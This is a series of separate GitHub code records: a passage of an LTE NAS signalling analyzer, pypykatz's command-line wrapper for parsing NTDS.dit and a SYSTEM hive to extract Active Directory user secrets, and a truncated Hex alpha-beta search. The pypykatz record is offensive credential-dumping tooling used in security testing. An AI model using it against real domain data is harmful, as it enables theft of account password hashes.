Substate\"]\n tmp = msg.data[\"PLMN\"].split('-')\n self.__emm_status.guti.mcc = tmp[0]\n self.__emm_status.guti.mnc = tmp[1]\n self.__emm_status.guti.mme_group_id = msg.data[\"GUTI MME Group ID\"]\n self.__emm_status.guti.mme_code = msg.data[\"GUTI MME Code\"]\n self.__emm_status.guti.m_tmsi = msg.data[\"GUTI M-TMSI\"]\n self.log_info(self.__emm_status.dump())\n\n #broadcast\n state = {\n 'conn state': self.__emm_status.state,\n 'conn substate': self.__emm_status.substate,\n }\n\n # self.log_info('EMM_STATE', str(state))\n self.broadcast_info('EMM_STATE', state)\n\n if self.callflow_state_machine.update_state(msg):\n self.log_info(\"Call flow status: \" + str(self.callflow_state_machine.get_current_state()))\n\n\n\n def __callback_esm_state(self,msg):\n \"\"\"\n Given the ESM message, update ESM state\n\n :param msg: the NAS signaling message that carries EMM state\n \"\"\"\n self.__cur_eps_id = msg.data[\"EPS bearer ID\"]\n\n if self.__cur_eps_id not in self.__esm_status:\n self.__esm_status[self.__cur_eps_id] = EsmStatus()\n\n # print self.__cur_eps_id, str(self.__esm_status), str(bearer_type), msg.data[\"EPS bearer type\"], str(msg.data['timestamp'])\n\n self.__esm_status[self.__cur_eps_id].eps_id = int(msg.data[\"EPS bearer ID\"])\n self.__esm_status[self.__cur_eps_id].type = int(msg.data[\"EPS bearer type\"])\n if self.__esm_status[self.__cur_eps_id].type == 255:\n self.__esm_status[self.__cur_eps_id].type = 1\n self.__esm_status[self.__cur_eps_id].qos.qci = msg.data[\"QCI\"]\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink = msg.data[\"UL MBR\"]\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink = msg.data[\"DL MBR\"]\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink=msg.data[\"UL GBR\"]\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink=msg.data[\"DL MBR\"]\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink_ext=msg.data[\"UL MBR ext\"]\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink_ext=msg.data[\"DL MBR ext\"]\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink_ext=msg.data[\"UL GBR ext\"]\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink_ext=msg.data[\"DL MBR ext\"]\n\n self.__esm_status[self.__cur_eps_id].timestamp = msg.data[\"timestamp\"]\n\n self.log_info(self.__esm_status[self.__cur_eps_id].dump())\n\n self.profile.update(\"LteNasProfile:\"+self.__emm_status.profile_id()+\".eps.qos:\"+bearer_type[self.__esm_status[self.__cur_eps_id].type],\n {'qci':self.__esm_status[self.__cur_eps_id].qos.qci,\n 'max_bitrate_ulink':self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink,\n 'max_bitrate_dlink':self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink,\n 'guaranteed_bitrate_ulink':self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink,\n 'guaranteed_bitrate_dlink':self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink,\n 'max_bitrate_ulink_ext':self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink_ext,\n 'max_bitrate_dlink_ext':self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink_ext,\n 'guaranteed_bitrate_ulink_ext':self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink_ext,\n 'guaranteed_bitrate_dlink_ext':self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink_ext,\n })\n\n # broadcast\n state = {\n 'conn state': esm_state[int(msg.data[\"EPS bearer state\"]) - 1],\n 'timestamp' : str(msg.data['timestamp'])\n }\n # self.log_info(str(state))\n self.broadcast_info('ESM_STATE', state)\n\n def 
__callback_emm(self,msg):\n \"\"\"\n Extract EMM status and configurations from the NAS messages\n\n :param msg: the EMM NAS message\n \"\"\"\n\n for field in msg.data.iter('field'):\n\n if field.get('show') == \"UE network capability\":\n # print str(ET.dump(field))\n for val in field.iter('field'):\n if val.get('name') == 'nas_eps.emm.acc_csfb_cap':\n csfb_cap = True if val.get('show') == '1' else False\n self.log_info(\"CSFB Capbility: \" + str(csfb_cap))\n bcast_dict = {}\n bcast_dict['cafb cap'] = str(csfb_cap)\n bcast_dict['timestamp'] = str(msg.timestamp)\n self.broadcast_info('CSFB_CAP', bcast_dict)\n\n\n if field.get('show')==\"EPS mobile identity - GUTI\":\n\n field_val={}\n\n field_val['e212.mcc']=None\n field_val['e212.mnc']=None\n field_val['nas_eps.emm.mme_grp_id']=None\n field_val['nas_eps.emm.mme_code']=None\n field_val['nas_eps.emm.m_tmsi']=None\n\n for val in field.iter('field'):\n field_val[val.get('name')]=val.get('show')\n\n self.__emm_status.guti.mcc=field_val['e212.mcc']\n self.__emm_status.guti.mnc=field_val['e212.mnc']\n self.__emm_status.guti.mme_group_id=field_val['nas_eps.emm.mme_grp_id']\n self.__emm_status.guti.mme_code=field_val['nas_eps.emm.mme_code']\n self.__emm_status.guti.m_tmsi=field_val['nas_eps.emm.m_tmsi']\n\n def __callback_esm(self,msg):\n \"\"\"\n Extract ESM status and configurations from the NAS messages\n\n :param msg: the ESM NAS message\n \"\"\"\n\n if self.callflow_state_machine.update_state(msg):\n self.log_info(\"Call flow status: \" + str(self.callflow_state_machine.get_current_state()))\n\n for field in msg.data.iter('field'):\n\n if field.get('name')==\"nas_eps.bearer_id\":\n self.__cur_eps_id = int(field.get('show'))\n if self.__cur_eps_id not in self.__esm_status:\n self.__esm_status[self.__cur_eps_id]=EsmStatus()\n\n if field.get('name')==\"nas_eps.emm.qci\":\n self.__esm_status[self.__cur_eps_id].qos.qci=int(field.get('show'))\n\n if field.get('show')==\"Quality Of Service - Negotiated QoS\" \\\n or field.get('show')==\"Quality Of Service - New QoS\" \\\n or field.get('show')==\"Quality Of Service - Requested QoS\":\n\n field_val={}\n\n for val in field.iter('field'):\n field_val[val.get('name')]=val.get('show')\n\n self.__esm_status[self.__cur_eps_id].eps_id = int(self.__cur_eps_id)\n if 'gsm_a.gm.sm.qos.delay_cls' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.delay_class=int(field_val['gsm_a.gm.sm.qos.delay_cls'])\n\n if 'gsm_a.gm.sm.qos.reliability_cls' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.reliability_class=int(field_val['gsm_a.gm.sm.qos.reliability_cls'])\n\n if 'gsm_a.gm.sm.qos.prec_class' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.precedence_class=int(field_val['gsm_a.gm.sm.qos.prec_class'])\n\n if 'gsm_a.gm.sm.qos.peak_throughput' in field_val:\n #10.5.6.5, TS24.008\n self.__esm_status[self.__cur_eps_id].qos.peak_tput=1000*pow(2,int(field_val['gsm_a.gm.sm.qos.peak_throughput'])-1)\n\n if 'gsm_a.gm.sm.qos.mean_throughput' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.mean_tput=mean_tput[int(field_val['gsm_a.gm.sm.qos.mean_throughput'])]\n\n if 'gsm_a.gm.sm.qos.traffic_cls' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.traffic_class=int(field_val['gsm_a.gm.sm.qos.traffic_cls'])\n\n if 'gsm_a.gm.sm.qos.del_order' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.delivery_order=int(field_val['gsm_a.gm.sm.qos.del_order'])\n\n if 'gsm_a.gm.sm.qos.traff_hdl_pri' in field_val:\n 
self.__esm_status[self.__cur_eps_id].qos.traffic_handling_priority=int(field_val['gsm_a.gm.sm.qos.traff_hdl_pri'])\n\n if 'gsm_a.gm.sm.qos.ber' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.residual_ber=residual_ber[int(field_val['gsm_a.gm.sm.qos.ber'])]\n\n if 'gsm_a.gm.sm.qos.trans_delay' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.transfer_delay=trans_delay(int(field_val['gsm_a.gm.sm.qos.trans_delay']))\n\n if 'gsm_a.gm.sm.qos.max_bitrate_upl' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink=max_bitrate(int(field_val['gsm_a.gm.sm.qos.max_bitrate_upl']))\n\n if 'gsm_a.gm.sm.qos.max_bitrate_downl' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink=max_bitrate(int(field_val['gsm_a.gm.sm.qos.max_bitrate_downl']))\n\n if 'gsm_a.gm.sm.qos.guar_bitrate_upl' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink=max_bitrate(int(field_val['gsm_a.gm.sm.qos.guar_bitrate_upl']))\n\n if 'gsm_a.gm.sm.qos.guar_bitrate_downl' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink=max_bitrate(int(field_val['gsm_a.gm.sm.qos.guar_bitrate_downl']))\n\n if 'gsm_a.gm.sm.qos.max_bitrate_upl_ext' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink_ext=max_bitrate_ext(int(field_val['gsm_a.gm.sm.qos.max_bitrate_upl_ext']))\n\n if 'gsm_a.gm.sm.qos.max_bitrate_downl_ext' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink_ext=max_bitrate_ext(int(field_val['gsm_a.gm.sm.qos.max_bitrate_downl_ext']))\n if 'gsm_a.gm.sm.qos.guar_bitrate_upl_ext' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink_ext=max_bitrate_ext(int(field_val['gsm_a.gm.sm.qos.guar_bitrate_upl_ext']))\n if 'gsm_a.gm.sm.qos.guar_bitrate_downl_ext' in field_val:\n self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink_ext=max_bitrate_ext(int(field_val['gsm_a.gm.sm.qos.guar_bitrate_downl_ext']))\n\n self.log_info(\"EPS_Id=\"+str(self.__cur_eps_id)+self.__esm_status[self.__cur_eps_id].dump())\n\n # profile update for esm qos\n self.profile.update(\"LteNasProfile:\"+xstr(self.__emm_status.profile_id())+\".eps.qos:\"+bearer_type[self.__esm_status[self.__cur_eps_id].type],\n {\n 'delay_class':xstr(self.__esm_status[self.__cur_eps_id].qos.delay_class),\n 'reliability_class':xstr(self.__esm_status[self.__cur_eps_id].qos.reliability_class),\n 'precedence_class':xstr(self.__esm_status[self.__cur_eps_id].qos.precedence_class),\n 'peak_tput':xstr(self.__esm_status[self.__cur_eps_id].qos.peak_tput),\n 'mean_tput':xstr(self.__esm_status[self.__cur_eps_id].qos.mean_tput),\n 'traffic_class':xstr(self.__esm_status[self.__cur_eps_id].qos.traffic_class),\n 'delivery_order':xstr(self.__esm_status[self.__cur_eps_id].qos.delivery_order),\n 'traffic_handling_priority':xstr(self.__esm_status[self.__cur_eps_id].qos.traffic_handling_priority),\n 'residual_ber':xstr(self.__esm_status[self.__cur_eps_id].qos.residual_ber),\n 'transfer_delay':xstr(self.__esm_status[self.__cur_eps_id].qos.transfer_delay),\n 'max_bitrate_ulink':xstr(self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink),\n 'max_bitrate_dlink':xstr(self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink),\n 'guaranteed_bitrate_ulink':xstr(self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink),\n 'guaranteed_bitrate_dlink':xstr(self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink),\n 
'max_bitrate_ulink_ext':xstr(self.__esm_status[self.__cur_eps_id].qos.max_bitrate_ulink_ext),\n 'max_bitrate_dlink_ext':xstr(self.__esm_status[self.__cur_eps_id].qos.max_bitrate_dlink_ext),\n 'guaranteed_bitrate_ulink_ext':xstr(self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_ulink_ext),\n 'guaranteed_bitrate_dlink_ext':xstr(self.__esm_status[self.__cur_eps_id].qos.guaranteed_bitrate_dlink_ext),\n })\n if self.__cur_eps_id in self.__esm_status:\n self.log_info(str(self.__esm_status[self.__cur_eps_id].qos.dump_rate()))\n self.log_info(str(self.__esm_status[self.__cur_eps_id].qos.dump_delivery()))\n self.broadcast_info('QOS_DELIVERY', self.__esm_status[self.__cur_eps_id].qos.dump_delivery_dict())\n self.broadcast_info('QOS_RATE', self.__esm_status[self.__cur_eps_id].qos.dump_rate_dict())\n\n\n def getTimeInterval(self, preTime, curTime):\n # preTime_parse = dt.strptime(preTime, '%Y-%m-%d %H:%M:%S.%f')\n # curTime_parse = dt.strptime(curTime, '%Y-%m-%d %H:%M:%S.%f')\n return (curTime - preTime).total_seconds() * 1000000.0\n\n def get_qos(self):\n # return self.__esm_status.qos\n if self.__cur_eps_id in self.__esm_status:\n return self.__esm_status[self.__cur_eps_id].qos\n else:\n #Check if QoS profile exists in data base\n return None\n\n def get_profiled_qos(self,plmn):\n \"\"\"\n Get QoS from the profile (if any)\n \"\"\"\n if plmn:\n tmp = self.profile.query(\"LteNasProfile:\"+xstr(plmn)+\".eps.qos:default\")\n # tmp = self.profile.query(\"LteNasProfile:\"+xstr(self.__emm_status.profile_id())+\".eps.qos:\"+bearer_type[self.__esm_status[self.__cur_eps_id].type])\n if not tmp:\n return None\n f_qos_int = lambda x: int(x) if x and x!=\"unknown\" else None\n f_qos_float = lambda x: float(x) if x and x!=\"unknown\" else None\n res = EsmQos()\n res.qci=f_qos_int(tmp['qci'])\n res.delay_class=f_qos_int(tmp['delay_class'])\n res.reliability_class=f_qos_int(tmp['reliability_class'])\n res.precedence_class=f_qos_int(tmp['precedence_class'])\n res.peak_tput=f_qos_int(tmp['peak_tput'])\n res.mean_tput=tmp['mean_tput']\n res.traffic_class=f_qos_int(tmp['traffic_class'])\n res.delivery_order=f_qos_int(tmp['delivery_order'])\n res.transfer_delay=f_qos_int(tmp['transfer_delay'])\n res.traffic_handling_priority=f_qos_int(tmp['traffic_handling_priority'])\n res.max_bitrate_ulink=f_qos_int(tmp['max_bitrate_ulink'])\n res.max_bitrate_dlink=f_qos_int(tmp['max_bitrate_dlink'])\n res.guaranteed_bitrate_ulink=f_qos_int(tmp['guaranteed_bitrate_ulink'])\n res.guaranteed_bitrate_dlink=f_qos_int(tmp['guaranteed_bitrate_dlink'])\n res.max_bitrate_ulink_ext=f_qos_int(tmp['max_bitrate_ulink_ext'])\n res.max_bitrate_dlink_ext=f_qos_int(tmp['max_bitrate_dlink_ext'])\n res.guaranteed_bitrate_ulink_ext=f_qos_int(tmp['guaranteed_bitrate_ulink_ext'])\n res.guaranteed_bitrate_dlink_ext=f_qos_int(tmp['guaranteed_bitrate_dlink_ext'])\n res.residual_ber=f_qos_float(tmp['residual_ber'])\n return res\n else:\n return None\n\n # if self.__cur_eps_id:\n # tmp = self.profile.query(\"LteNasProfile:\"+xstr(self.__emm_status.profile_id())+\".eps.qos:\"+bearer_type[self.__esm_status[self.__cur_eps_id].type])\n # print tmp\n # else:\n # return None\n\nclass EmmStatus:\n \"\"\"\n An abstraction to maintain the EMM status, including the registeration states,\n temporary IDs (GUTI), security options, etc.\n \"\"\"\n def __init__(self):\n self.state = \"null\"\n self.substate = \"null\"\n self.guti = Guti()\n self.ciphering = None\n self.integrity = None\n self.timestamp = None\n\n def inited(self):\n return (self.state and 
self.substate and self.guti.inited())\n\n def profile_id(self):\n \"\"\"\n Return a globally unique id (MCC-MNC-MMEGI-MMEC) for profiling\n \"\"\"\n if not self.guti.inited():\n return None\n else:\n return (str(self.guti.mcc)\n + '-' + str(self.guti.mnc)\n )\n\n # return (str(self.guti.mcc)\n # + '-' + str(self.guti.mnc)\n # + '-' + str(int(self.guti.mme_group_id,0))\n # + '-' + str(int(self.guti.mme_code,0)))\n\n def dump(self):\n \"\"\"\n Report the EMM status\n\n :returns: a string that encodes EMM status\n \"\"\"\n\n return (self.__class__.__name__\n + ' EMM.state='+xstr(self.state) + ' EMM.substate='+xstr(self.substate)\n + ' MCC=' + xstr(self.guti.mcc) + ' MNC=' + xstr(self.guti.mnc)\n + ' MMEGI=' + xstr(self.guti.mme_group_id) + ' MMEC=' + xstr(self.guti.mme_code)\n + ' TMSI=' + xstr(self.guti.m_tmsi))\n\n\nclass Guti:\n \"\"\"\n An abstraction to maintain Globally Unique Temporary ID (GUTI)\n \"\"\"\n def __init__(self):\n self.mcc=None\n self.mnc=None\n self.mme_group_id=None\n self.mme_code=None\n self.m_tmsi=None\n\n def inited(self):\n \"\"\"\n Return true if all GUTI fileds are initialized\n \"\"\"\n return (self.mcc and self.mnc and self.mme_group_id \\\n and self.mme_code and self.m_tmsi)\n\n\nclass EsmStatus:\n \"\"\"\n An abstraction to maintain the ESM status\n \"\"\"\n def __init__(self):\n self.eps_id = None\n self.type = 0 #default or dedicated\n self.qos=EsmQos()\n self.timestamp = None\n\n def dump(self):\n # TODO: deal with potential KeyError here\n dump_text = ' EPS_ID=' + xstr(self.eps_id) + ' type=' + xstr(bearer_type[self.type]) \\\n + \":\\n\\t\"+self.qos.dump_rate()+'\\n\\t'+self.qos.dump_delivery()\n return dump_text\n\nclass EsmQos:\n \"\"\"\n An abstraction for ESM QoS profiles\n \"\"\"\n def __init__(self):\n self.qci=None\n self.delay_class=None\n self.reliability_class=None\n self.precedence_class=None\n self.peak_tput=None\n self.mean_tput=None\n self.traffic_class=None\n self.delivery_order=None\n self.transfer_delay=None\n self.traffic_handling_priority=None\n self.max_bitrate_ulink=None\n self.max_bitrate_dlink=None\n self.guaranteed_bitrate_ulink=None\n self.guaranteed_bitrate_dlink=None\n self.max_bitrate_ulink_ext=None\n self.max_bitrate_dlink_ext=None\n self.guaranteed_bitrate_ulink_ext=None\n self.guaranteed_bitrate_dlink_ext=None\n self.residual_ber=None\n\n def dump_rate(self):\n \"\"\"\n Report the data rate profile in ESM QoS, including the peak/mean throughput,\n maximum downlink/uplink data rate, guaranteed downlink/uplink data rate, etc.\n\n :returns: a string that encodes all the data rate\n :rtype: string\n \"\"\"\n return (self.__class__.__name__\n + ' peak_tput=' + xstr(self.peak_tput) + ' mean_tput=' + xstr(self.mean_tput)\n + ' max_bitrate_ulink=' + xstr(self.max_bitrate_ulink) + ' max_bitrate_dlink=' + xstr(self.max_bitrate_dlink)\n + ' guaranteed_birate_ulink=' + xstr(self.guaranteed_bitrate_ulink) + ' guaranteed_birate_dlink=' + xstr(self.guaranteed_bitrate_dlink)\n + ' max_bitrate_ulink_ext=' + xstr(self.max_bitrate_ulink_ext) + ' max_bitrate_dlink_ext=' + xstr(self.max_bitrate_dlink_ext)\n + ' guaranteed_birate_ulink_ext=' + xstr(self.guaranteed_bitrate_ulink_ext) + ' guaranteed_birate_dlink_ext=' + xstr(self.guaranteed_bitrate_dlink_ext))\n\n def dump_rate_dict(self):\n \"\"\"\n Report the data rate profile in ESM QoS, including the peak/mean throughput,\n maximum downlink/uplink data rate, guaranteed downlink/uplink data rate, etc.\n\n :returns: a dict that encodes all the data rate\n :rtype: dict\n \"\"\"\n res = {}\n 
res['peak_tput'] = xstr(self.peak_tput)\n        res['mean_tput'] = xstr(self.mean_tput)\n        res['max_bitrate_ulink'] = xstr(self.max_bitrate_ulink)\n        res['max_bitrate_dlink'] = xstr(self.max_bitrate_dlink)\n        res['guaranteed_birate_ulink'] = xstr(self.guaranteed_bitrate_ulink)\n        res['guaranteed_birate_dlink'] = xstr(self.guaranteed_bitrate_dlink)\n        res['max_bitrate_ulink_ext'] = xstr(self.max_bitrate_ulink_ext)\n        res['max_bitrate_dlink_ext'] = xstr(self.max_bitrate_dlink_ext)\n        res['guaranteed_birate_ulink_ext'] = xstr(self.guaranteed_bitrate_ulink_ext)\n        res['guaranteed_birate_dlink_ext'] = xstr(self.guaranteed_bitrate_dlink_ext)\n        return res\n\n    def dump_delivery(self):\n        \"\"\"\n        Report the delivery profile in ESM QoS, including delivery order guarantee,\n        traffic class, QCI, delay class, transfer delay, etc.\n\n        :returns: a string that encodes the delivery profile, or None if not ready\n        :rtype: string\n        \"\"\"\n\n        if self.delivery_order:\n            order = delivery_order[self.delivery_order]\n        else:\n            order = None\n        if self.traffic_class:\n            tra_class = traffic_class[self.traffic_class]\n        else:\n            tra_class = None\n        return (self.__class__.__name__\n                + ' delivery_order=' + xstr(order)\n                + ' traffic_class=' + xstr(tra_class)\n                + ' QCI=' + xstr(self.qci) + ' delay_class=' + xstr(self.delay_class)\n                + ' transfer_delay=' + xstr(self.transfer_delay) + ' residual_BER=' + xstr(self.residual_ber))\n\n    def dump_delivery_dict(self):\n        \"\"\"\n        Report the delivery profile in ESM QoS, including delivery order guarantee,\n        traffic class, QCI, delay class, transfer delay, etc.\n\n        :returns: a dict that encodes the delivery profile\n        :rtype: dict\n        \"\"\"\n\n        if self.delivery_order:\n            order = delivery_order[self.delivery_order]\n        else:\n            order = None\n        if self.traffic_class:\n            tra_class = traffic_class[self.traffic_class]\n        else:\n            tra_class = None\n        res = {}\n        res['delivery_order'] = xstr(order)\n        res['traffic_class'] = xstr(tra_class)\n        res['QCI'] = xstr(self.qci)\n        res['delay_class'] = xstr(self.delay_class)\n        res['transfer_delay'] = xstr(self.transfer_delay)\n        res['residual_BER'] = xstr(self.residual_ber)\n        return res\n\ndef LteNasProfileHierarchy():\n    '''\n    Return a Lte Nas ProfileHierarchy (configurations)\n\n    :returns: ProfileHierarchy for LTE NAS\n    '''\n\n    profile_hierarchy = ProfileHierarchy('LteNasProfile')\n    root = profile_hierarchy.get_root()\n    eps = root.add('eps',False)\n\n    qos = eps.add('qos',True) #Active-state configurations (indexed by EPS type: default or dedicated)\n\n    #QoS parameters\n    qos.add('qci',False)\n    qos.add('delay_class',False)\n    qos.add('reliability_class',False)\n    qos.add('precedence_class',False)\n    qos.add('peak_tput',False)\n    qos.add('mean_tput',False)\n    qos.add('traffic_class',False)\n    qos.add('delivery_order',False)\n    qos.add('transfer_delay',False)\n    qos.add('traffic_handling_priority',False)\n    qos.add('max_bitrate_ulink',False)\n    qos.add('max_bitrate_dlink',False)\n    qos.add('guaranteed_bitrate_ulink',False)\n    qos.add('guaranteed_bitrate_dlink',False)\n    qos.add('max_bitrate_ulink_ext',False)\n    qos.add('max_bitrate_dlink_ext',False)\n    qos.add('guaranteed_bitrate_ulink_ext',False)\n    qos.add('guaranteed_bitrate_dlink_ext',False)\n    qos.add('residual_ber',False)\n\n    return profile_hierarchy","repo_name":"mobile-insight/mobileinsight-core","sub_path":"mobile_insight/analyzer/lte_nas_analyzer.py","file_name":"lte_nas_analyzer.py","file_ext":"py","file_size_in_byte":35565,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"53"}
+{"seq_id":"20123888632","text":"\n\n#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n#\n\nimport asyncio\nimport platform\nfrom tqdm import tqdm\n\nasync def flush_buffer(buffer, outfile_handle = None):\n\ttry:\n\t\tif outfile_handle is not None:\n\t\t\tres = ''\n\t\t\tfor secret in buffer:\n\t\t\t\ttry:\n\t\t\t\t\tres += str(secret)\n\t\t\t\texcept:\n\t\t\t\t\tcontinue\n\t\t\toutfile_handle.write(res)\n\t\telse:\n\t\t\tfor secret in buffer:\n\t\t\t\ttry:\n\t\t\t\t\tprint(str(secret))\n\t\t\t\texcept:\n\t\t\t\t\tcontinue\n\t\t\n\t\tbuffer = []\n\t\treturn True, None\n\texcept Exception as e:\n\t\treturn None, e\n\nclass ParsersCMDHelper:\n\tdef __init__(self):\n\t\tself.live_keywords = ['parser']\n\t\tself.keywords = ['parser']\n\t\t\n\tdef add_args(self, parser, live_parser):\n\t\tparser_group = parser.add_parser('parser', help='SMB related commands')\n\t\tparser_subparsers = parser_group.add_subparsers()\n\t\tparser_subparsers.required = True\n\t\tparser_subparsers.dest = 'parser_module'\n\n\t\tntds_group = parser_subparsers.add_parser('ntds', help='NTDS.dit file parser, extracting secrets')\n\t\tntds_group.add_argument('ntdsfile', help=\"NTDS.dit file\")\n\t\tntds_group.add_argument('systemhive', help=\"SYSTEM hive file or the Bootkey(in hex). This is needed to decrypt the secrets\")\n\t\tntds_group.add_argument('-p', '--progress', action='store_true', help=\"Show progress bar. Please use this only if you also specified an output file.\")\n\t\tntds_group.add_argument('-o', '--outfile', help='Output file. If omitted secrets will be printed to STDOUT')\n\t\tntds_group.add_argument('--strict', action='store_true', help='Strict parsing. Fails on errors')\n\t\tntds_group.add_argument('--no-history', action='store_true', help='Do not parse history')\n\t\t\n\t\t\n\tdef execute(self, args):\n\t\tif args.command in self.keywords:\n\t\t\tasyncio.run(self.run(args))\n\t\t\n\t\tif len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:\n\t\t\tasyncio.run(self.run_live(args))\n\t\t\t\n\t\t\t\n\tasync def run_live(self, args):\n\t\tif platform.system().lower() != 'windows':\n\t\t\traise Exception('Live commands only work on Windows!')\n\t\t\t\n\tasync def run(self, args):\n\t\tif args.parser_module == 'ntds':\n\t\t\tfrom aesedb.examples.ntdsparse import NTDSParserConsole\n\t\t\tntdscon = NTDSParserConsole(\n\t\t\t\targs.systemhive,\n\t\t\t\targs.ntdsfile,\n\t\t\t\tignore_errors=args.strict,\n\t\t\t\twith_history=not args.no_history\n\t\t\t)\n\n\t\t\tbuffer = []\n\t\t\tbuffer_size = 1000\n\t\t\ttotal = await ntdscon.get_total_rows()\n\t\t\tif args.progress is True:\n\t\t\t\tpbar = tqdm(desc='JET table parsing ', total=total, unit='records', miniters= total//200 ,position=0)\n\t\t\t\tpbar_sec = tqdm(desc='User secrets found', unit = '', miniters=buffer_size//10 ,position=1)\n\n\t\t\toutfile_handle = None\n\t\t\tif args.outfile is not None:\n\t\t\t\toutfile_handle = open(args.outfile, 'w', newline = '')\n\n\t\t\tasync for secret, err in ntdscon.get_secrets():\n\t\t\t\tif err is not None:\n\t\t\t\t\traise err\n\n\t\t\t\tif args.progress is True:\n\t\t\t\t\tpbar.update()\n\t\t\t\t\t\n\t\t\t\tif secret is None:\n\t\t\t\t\tcontinue\n\t\t\t\t\t\n\t\t\t\tif args.progress is True:\n\t\t\t\t\tpbar_sec.update()\n\t\t\t\t\t\n\n\t\t\t\tbuffer.append(secret)\n\t\t\t\tif len(buffer) > buffer_size:\n\t\t\t\t\t_, err = await flush_buffer(buffer, outfile_handle)\n\t\t\t\t\tbuffer = []\n\t\t\t\t\tif err is not None:\n\t\t\t\t\t\traise err\n\n\t\t\t\t\n\t\t\t_, err = 
await flush_buffer(buffer, outfile_handle)\n\t\t\tbuffer = []\n\t\t\tif err is not None:\n\t\t\t\traise err\n\n\n\t\t\t#parser = NTDSParserConsole(args.systemhive, args.ntdsfile, show_progress = args.progress, outfile = args.outfile)\n\t\t\t#await parser.run()\n\n\t\t","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/parsers/cmdhelper.py","file_name":"cmdhelper.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"28140422187","text":"from hex_skeleton import HexBoard\r\nimport random as rd\r\nimport numpy as np\r\nimport pandas as pd\r\nimport copy\r\nfrom trueskill import Rating, quality_1vs1, rate_1vs1\r\n\r\nSIZE = 4\r\nEMPTY = HexBoard.EMPTY\r\nINF = 99\r\nagent1 = HexBoard.BLUE\r\nagent2 = HexBoard.RED\r\n\r\ndf_alphabeta = pd.DataFrame(columns=['d', 'g', 'a', 'b'])  # store d,g,a,b values\r\ndf_movelist = pd.DataFrame(columns=['x', 'y'])  # store movelist of player and AI\r\n\r\n\r\ndef alphabeta(board, d, a, b, method, agent1, agent2, type_max=True):\r\n    global df_alphabeta, df_movelist\r\n    if d <= 0:\r\n        return eval(board, method)\r\n    elif type_max == True:\r\n        g = -INF\r\n        for i in range(SIZE):\r\n            for j in range(SIZE):\r\n\r\n                if board.is_empty((i, j)):\r\n                    board.place((i, j), agent1)\r\n\r\n                    g_star = g\r\n                    g = max(g, alphabeta(board, d - 1, a, b, method, agent1, agent2, type_max=False))\r\n                    a = max(a, g)  # Update alpha.\r\n\r\n                    df_alphabeta = df_alphabeta.append({'d': d, 'g': g, 'a': a, 'b': b}, ignore_index=True)\r\n\r\n                    if g > g_star:\r\n                        best_move = (i, j)\r\n                    board.clear((i, j))\r\n\r\n                    if a >= b:  # g>=b\r\n                        break\r\n\r\n    elif type_max == False:\r\n        g = INF\r\n        for i in range(SIZE):\r\n            for j in range(SIZE):\r\n\r\n                if board.is_empty((i, j)):\r\n                    board.place((i, j), agent2)\r\n\r\n                    g = min(g, alphabeta(board, d - 1, a, b, method, agent1, agent2, type_max=True))\r\n                    b = min(b, g)  # Update beta\r\n\r\n                    df_alphabeta = df_alphabeta.append({'d': d, 'g': g, 'a': a, 'b': b}, ignore_index=True)\r\n\r\n                    board.clear((i, j))\r\n\r\n                    if a >= b:  # a>=g\r\n                        break\r\n    if d == DEPTH:\r\n        df_movelist = df_movelist.append({'x': best_move[0], 'y': best_move[1]}, ignore_index=True)\r\n    return g\r\n\r\n\r\n\r\ndef eval(board, method):\r\n    if method == 'random':\r\n        random_number = rd.randint(1, 9)\r\n        return random_number\r\n    else:\r\n        a1_heur_val = dijkstra_sp(board, player=agent1)\r\n        a2_heur_val = dijkstra_sp(board, player=agent2)\r\n        return a2_heur_val - a1_heur_val\r\n\r\n\r\ndef dijkstra_sp(board, player):\r\n    initial = []\r\n\r\n    if player == agent1:\r\n        for i in range(SIZE):\r\n            initial.append((0, i))\r\n    if player == agent2:\r\n        for i in range(SIZE):\r\n            initial.append((i, 0))\r\n\r\n    # Make a distance graph.\r\n    distance_graph = np.zeros((SIZE, SIZE))\r\n    